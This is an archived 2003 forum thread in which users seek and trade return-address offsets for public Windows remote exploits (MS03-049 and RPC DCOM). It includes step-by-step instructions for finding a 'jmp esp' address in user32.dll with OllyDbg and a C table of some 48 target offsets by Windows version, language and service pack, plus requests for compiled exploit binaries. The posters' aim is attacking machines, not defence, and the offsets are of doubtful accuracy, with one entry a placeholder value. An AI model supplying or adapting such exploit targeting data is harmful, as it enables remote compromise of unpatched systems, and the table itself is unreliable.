Basti
Nov 22 2003, 08:40 AM
Hi m8s, where can i find other Offsets for the MS03049 - Exploit (
http://www.governmentsecurity.org/forum/in...?showtopic=4352 ) << this one - or how can i find out..
Im interested if there are WORKING offsets 4 the other SPs and 4 all languages and if there are offsets for NTFS, too. 'Cause this exploit is only for W2k Sp4/Sp1 engl Fat 32.
can anybody help?
greetz basti
Steffan
Nov 24 2003, 10:23 PM
may here U can find what U need if they still have the const. kit to get offesets ...
http://www.m00.ruC'ya
barabas
Nov 27 2003, 10:04 AM
to find the offset for your version:
Open services.exe with ollydbg
select: View-> executable modules
double click user32.dll
right click and search for command jmp esp.
there you have the offset.
pupkinvasya
Dec 1 2003, 01:38 AM
see
Windows RPC DCOM Remote Exploit with 48 TARGETS
48 Targets -- 48 Offsets
xaph
Dec 1 2003, 02:47 PM
If someone programming a 0349 exploits for german sys and win2k's plz post here or pm me
greetz xapH
barabas
Dec 1 2003, 03:17 PM
| QUOTE |
see
Windows RPC DCOM Remote Exploit with 48 TARGETS
48 Targets -- 48 Offsets |
hahaha...
You think you can use offsets for different dll's for everything?? good luck
xaph
Dec 2 2003, 08:33 AM
char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77" /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77" /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77" /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77" /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77"
char win2ksp4big[] = "\x29\x4c\xdf\x77"
char winxpsp01big[] = "\xfb\x7b\xa1\x71"
Here you have all offsets from 48 target exploit! Could you plz send me a compiled version too pm me or something I can't compile the source 4 windows cause I dont have those libaries...
greetz XaPH
320X
Dec 15 2003, 12:34 AM
mmm... good job xaph i will test it thnx for the post
teest
Dec 15 2003, 03:45 PM
is that offset from dcom 48targets? it shouldn't work...
Cyrus
Dec 15 2003, 05:59 PM
| QUOTE |
to find the offset for your version:
Open services.exe with ollydbg
select: View-> executable modules
double click user32.dll
right click and search for command jmp esp.
there you have the offset. |
I did that, my results are:
Found commands, item 1
Address=77D4643D
Disassembly=JMP ESP
And im on Win XP Pro SP1 german.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
